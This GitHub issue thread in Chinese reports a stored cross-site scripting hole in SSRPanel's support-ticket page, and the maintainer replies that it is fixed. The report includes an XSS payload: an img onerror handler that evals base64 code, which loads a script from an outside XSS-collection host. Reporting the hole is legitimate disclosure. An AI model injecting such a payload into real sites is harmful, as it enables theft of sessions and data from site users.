### ISSUE TITLE
漏洞？  工单页面可以被插xss

### ISSUE THREAD

**Issue by cmmdwl** [ssrpanel/SSRPanel#755]
<img src=x onerror=eval(atob('cz1jcmVhdGVFbGVtZW*******************nKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwOi8veHNzcHQuY29tL0w4MzAydj8nK01hdGgucmFuZG9tKCk='))>
我将这句xss
丢到了工单的 正文部分 并且发现可以被提交且正常显示在了工单页面 建议对此进行屏蔽处理
主要是屏蔽掉大部分 特殊/转义 符号

**Comment by ssrpanel** [comment]
已修复，求指教怎么构造攻击代码
